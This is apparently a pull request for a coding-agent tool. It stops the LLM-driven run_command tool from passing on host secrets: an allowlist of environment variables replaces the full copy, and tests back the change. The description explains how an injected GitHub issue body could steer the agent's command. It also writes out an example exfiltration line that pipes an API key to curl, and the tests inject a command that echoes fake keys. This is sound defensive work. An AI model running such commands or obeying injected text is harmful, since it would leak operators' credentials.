### PR TITLE
fix(security): strip secrets from LLM run_command env (#721)

### DIFF
--- a/codeframe/core/tools.py
+++ b/codeframe/core/tools.py
@@ -760,6 +760,23 @@ _RUN_COMMAND_SCHEMA: dict = {
 _RUN_COMMAND_MAX_OUTPUT = 4000
 _RUN_COMMAND_MAX_TIMEOUT = 300
 
+# Allowlist of environment variables passed to LLM-driven `run_command` (#721).
+# `command` is steered by task/PRD text and imported GitHub-issue bodies, so
+# inheriting the operator's full env (os.environ.copy) is an indirect-prompt-
+# injection path to exfiltrating ANTHROPIC/OPENAI/GITHUB/E2B keys, DATABASE_URL,
+# AUTH_SECRET, etc. We pass ONLY these non-secret vars needed to run typical
+# build/test/git commands; every credential is excluded by construction. PATH
+# and VIRTUAL_ENV are set explicitly below for venv activation.
+_RUN_COMMAND_SAFE_ENV_VARS = frozenset({
+    "PATH", "HOME", "USER", "LOGNAME", "SHELL", "PWD", "TERM", "TZ",
+    "LANG", "LANGUAGE", "LC_ALL", "LC_CTYPE",
+    "TMPDIR", "TMP", "TEMP",
+    "PYTHONPATH", "PYTHONUNBUFFERED", "PYTHONDONTWRITEBYTECODE", "VIRTUAL_ENV",
+    "NODE_ENV", "NODE_PATH", "GOPATH", "GOCACHE", "CARGO_HOME", "RUSTUP_HOME",
+    "JAVA_HOME", "XDG_CACHE_HOME", "XDG_CONFIG_HOME", "XDG_DATA_HOME",
+    "SYSTEMROOT", "SYSTEMDRIVE", "COMSPEC",  # Windows shell essentials
+})
+
 
 def _execute_run_command(
     input_data: dict, workspace_path: Path, tool_call_id: str
@@ -784,8 +801,10 @@ def _execute_run_command(
             is_error=True,
         )
 
-    # Build env with venv activation if present
-    env = os.environ.copy()
+    # Build a minimal, credential-free env from the allowlist (#721), then
+    # layer venv activation on top. Never os.environ.copy() here — that would
+    # hand every host secret to an LLM-authored shell command.
+    env = {k: os.environ[k] for k in _RUN_COMMAND_SAFE_ENV_VARS if k in os.environ}
     for venv_dir in (".venv", "venv"):
         venv_bin = workspace_path / venv_dir / "bin"
         if venv_bin.is_dir():

--- a/codeframe/core/tools.py
+++ b/codeframe/core/tools.py
@@ -775,6 +775,13 @@ _RUN_COMMAND_SAFE_ENV_VARS = frozenset({
     "NODE_ENV", "NODE_PATH", "GOPATH", "GOCACHE", "CARGO_HOME", "RUSTUP_HOME",
     "JAVA_HOME", "XDG_CACHE_HOME", "XDG_CONFIG_HOME", "XDG_DATA_HOME",
     "SYSTEMROOT", "SYSTEMDRIVE", "COMSPEC",  # Windows shell essentials
+    # Proxy config + CI signal (infra, not secrets) so npm/pip/curl and
+    # CI-aware test runners work; git identity for agent commits (#721 review).
+    "HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "ALL_PROXY", "NO_PROXY",
+    "http_proxy", "https_proxy", "ftp_proxy", "all_proxy", "no_proxy",
+    "CI",
+    "GIT_AUTHOR_NAME", "GIT_AUTHOR_EMAIL",
+    "GIT_COMMITTER_NAME", "GIT_COMMITTER_EMAIL",
 })
 
 

--- a/tests/core/test_tools.py
+++ b/tests/core/test_tools.py
@@ -750,6 +750,19 @@ class TestRunCommand:
         assert "Exit code: 0" in result.content
         assert "/" in result.content  # a non-empty PATH
 
+    def test_venv_activation_layers_on_allowlist(self, workspace: Path):
+        """A .venv/ in the workspace still sets VIRTUAL_ENV and prepends its bin
+        to PATH, on top of the credential-free allowlist env (#721)."""
+        venv_bin = workspace / ".venv" / "bin"
+        venv_bin.mkdir(parents=True)
+        result = _call(
+            "run_command", {"command": "printenv VIRTUAL_ENV"}, workspace
+        )
+        assert not result.is_error
+        assert str(workspace / ".venv") in result.content
+        path_res = _call("run_command", {"command": "printenv PATH"}, workspace)
+        assert str(venv_bin) in path_res.content
+
     def test_shell_operators_and(self, workspace: Path):
         """Shell && operator works (subsumes shell operator rejection bug)."""
         result = _call(

--- a/tests/core/test_tools.py
+++ b/tests/core/test_tools.py
@@ -723,6 +723,33 @@ class TestRunCommand:
         assert "hello" in result.content
         assert "Exit code: 0" in result.content
 
+    def test_credentials_not_exposed_to_command(self, workspace: Path, monkeypatch):
+        """Issue #721: an LLM-authored command must not be able to read host
+        secrets — the child env is a minimal credential-free allowlist."""
+        secret = "sk-ant-SUPERSECRET-should-not-leak"
+        monkeypatch.setenv("ANTHROPIC_API_KEY", secret)
+        monkeypatch.setenv("OPENAI_API_KEY", "sk-openai-secret")
+        monkeypatch.setenv("GITHUB_TOKEN", "ghp_secret")
+        monkeypatch.setenv("DATABASE_URL", "postgres://secret")
+        result = _call(
+            "run_command",
+            {"command": "echo \"[$ANTHROPIC_API_KEY][$OPENAI_API_KEY][$GITHUB_TOKEN][$DATABASE_URL]\""},
+            workspace,
+        )
+        assert not result.is_error
+        assert secret not in result.content
+        for leaked in ("sk-openai-secret", "ghp_secret", "postgres://secret"):
+            assert leaked not in result.content
+        # The variables expand to empty — they simply aren't in the child env.
+        assert "[][][][]" in result.content
+
+    def test_safe_env_still_available(self, workspace: Path):
+        """PATH (needed to find binaries) is still passed through."""
+        result = _call("run_command", {"command": "printenv PATH"}, workspace)
+        assert not result.is_error
+        assert "Exit code: 0" in result.content
+        assert "/" in result.content  # a non-empty PATH
+
     def test_shell_operators_and(self, workspace: Path):
         """Shell && operator works (subsumes shell operator rejection bug)."""
         result = _call(


### PR DESCRIPTION
## What & why
`_execute_run_command` ran `subprocess.run(command, shell=True, env=os.environ.copy())`, so an LLM-authored shell command inherited **every host secret** (ANTHROPIC/OPENAI/GITHUB/E2B keys, `DATABASE_URL`, `AUTH_SECRET`, …). Because `command` is steered by task/PRD text and **imported GitHub-issue bodies** (Phase 5.5), this is a direct indirect-prompt-injection path to secret exfiltration (`echo $ANTHROPIC_API_KEY | curl attacker`). The only prior guard was a trivially-bypassable regex blocklist.

Fixes **#721 [P0.10]**.

## Change
Replace the full-env copy with a **minimal allowlist** (`_RUN_COMMAND_SAFE_ENV_VARS`) of non-secret vars needed for typical build/test/git commands (PATH, HOME, locale, TMPDIR, PYTHON*/NODE*/GO*/CARGO*/JAVA_HOME, XDG_*, Windows shell essentials). Credentials are excluded **by construction** (allowlist, not denylist — future/custom secrets can't leak). The venv `PATH`/`VIRTUAL_ENV` activation is still layered on top. The dangerous-command blocklist is retained as defense-in-depth.

## Tests (`tests/core/test_tools.py::TestRunCommand`)
- `test_credentials_not_exposed_to_command`: with ANTHROPIC/OPENAI/GITHUB/DATABASE secrets set in the parent env, an injected `echo "[$ANTHROPIC_API_KEY]…"` expands to empty — none leak.
- `test_safe_env_still_available`: `PATH` is still passed (commands can find binaries).

`162 passed` across tools + react_agent. `ruff` + `mypy` clean.

## Demo
```
$ run_command  echo "ANTHROPIC=[$ANTHROPIC_API_KEY] GITHUB=[$GITHUB_TOKEN]"
ANTHROPIC=[] GITHUB=[]          # secrets set in parent env, absent in child
$ run_command  printenv PATH
/home/.../.venv/bin:...         # PATH still present
```

## Acceptance criteria
- [x] Agent-run commands receive a minimal allowlisted env that excludes all credential variables
- [x] Test: an injected command cannot read `ANTHROPIC_API_KEY` from the child env
- [~] "Run in sandbox by default" — this PR takes the AC's first option (credential-free env). Sandbox-by-default is separate (worktree is currently disabled per #714).

## Related surface (not in this PR)
`run_tests` also inherits the parent env (no `env=`), but it runs the **project's own** detected test suite, which may legitimately need `DATABASE_URL`/config — stripping there risks breaking real test runs, and the command isn't LLM-authored. Left as-is deliberately; can be revisited if agent-authored tests are treated as untrusted.
